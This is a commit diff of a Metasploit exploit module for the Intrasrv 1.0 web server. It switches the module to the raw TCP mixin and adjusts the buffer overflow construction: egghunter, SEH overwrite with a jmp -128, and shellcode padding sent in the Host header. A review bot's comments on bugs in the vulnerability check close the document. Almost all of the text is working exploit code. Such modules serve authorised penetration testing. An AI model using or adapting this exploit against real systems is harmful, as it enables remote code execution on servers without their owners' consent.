Use tcp mixin/clean corrupt bytes

bug/bundler_fix
Nathan Einwechter 2013-08-12 15:12:15 -04:00
parent 7854c452d2
commit 28f030494e
1 changed files with 26 additions and 18 deletions


@ -10,7 +10,7 @@ require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking Rank = NormalRanking
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Egghunter include Msf::Exploit::Egghunter
def initialize(info={}) def initialize(info={})
@ -37,6 +37,7 @@ class Metasploit3 < Msf::Exploit::Remote
], ],
'Payload' => 'Payload' =>
{ {
'Space' => '4660',
'StackAdjustment' => -3500, 'StackAdjustment' => -3500,
'BadChars' => "\x00" 'BadChars' => "\x00"
}, },
@ -60,12 +61,16 @@ class Metasploit3 < Msf::Exploit::Remote
end end
def check def check
res = send_request_cgi({ begin
'method' => 'GET', connect
'uri' => "/" rescue
}) print_error("Could not connect to target!")
return Exploit::CheckCode::Safe
end
sock.put("GET / HTTP/1.0\r\n")
res = sock.get
if res and res.headers['Server'] =~ /intrasrv 1.0/ if res =~ /intrasrv 1.0/
return Exploit::CheckCode::Vulnerable return Exploit::CheckCode::Vulnerable
else else
return Exploit::CheckCode::Safe return Exploit::CheckCode::Safe
@ -75,27 +80,30 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit def exploit
# setup egghunter # setup egghunter
hunter,egg = generate_egghunter(payload.encoded, payload_badchars, { hunter,egg = generate_egghunter(payload.encoded, payload_badchars, {
:checksum => true :checksum=>true, :eggtag=>"w00t"
}) })
# setup buffer # setup buffer
buf = rand_text(target['Offset']-128) # junk to egghunter buf = rand_text(target['Offset']-126) # junk to egghunter at jmp -128
buf << make_nops(8) + hunter # nopsled + egghunter at offset-128 buf << hunter # egghunter
buf << rand_text(target['Offset']-buf.length) # more junk to offset buf << rand_text(target['Offset']-buf.length) # more junk to offset
buf << "\xeb\x80\x90\x90" # nseh - jmp -128 to egghunter buf << "\xeb\x80\x90\x90" # nseh - jmp -128 to egghunter
buf << [target.ret].pack("V*") # seh buf << [target.ret].pack("V*") # seh
# Setup payload # Setup payload
shellcode = rand_text(50) # pad payload shellcode = egg
shellcode = egg + egg # attach egg tags # second last byte of payload gets corrupted - pad 2 bytes
shellcode << payload.encoded # so we don't corrupt the actual payload
shellcode << rand_text(2)
msp = pattern_create(20000)
print_status("Sending buffer...") print_status("Sending buffer...")
send_request_cgi({ # Payload location is an issue, so we're using the tcp mixin
'method' => 'GET', # instead of HttpClient here to maximize control over what's sent.
'uri' => "/", # (i.e. no additional headers to mess with the stack)
'vhost' => buf, connect
'data' => shellcode sock.put("GET / HTTP/1.0\r\nHost: #{buf}\r\n#{shellcode}")
}) disconnect
end end
end end
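Review bot: In the rewritten `check` (hunk at -60,12 +61,16) the probe `sock.put("GET / HTTP/1.0\r\n")` never terminates the header block, so a server that waits for the blank line before responding can leave `sock.get` with nothing, and the host is reported as Safe even when the `Server` banner would have matched; the socket opened by `connect` is also never closed on that path, and the method's closing lines are outside the hunk. Sending `sock.put("GET / HTTP/1.0\r\n\r\n")`, reading `res = sock.get`, and calling `disconnect` before the `=~ /intrasrv 1.0/` comparison fixes both. In the `exploit` hunk, `msp = pattern_create(20000)` builds a 20000-byte pattern that is never used and should be dropped as a leftover from debugging. The new `'Space' => '4660'` is a String while the neighbouring `'StackAdjustment' => -3500` is an Integer; presumably the payload-space comparison expects an Integer, so `'Space' => 4660` is worth confirming.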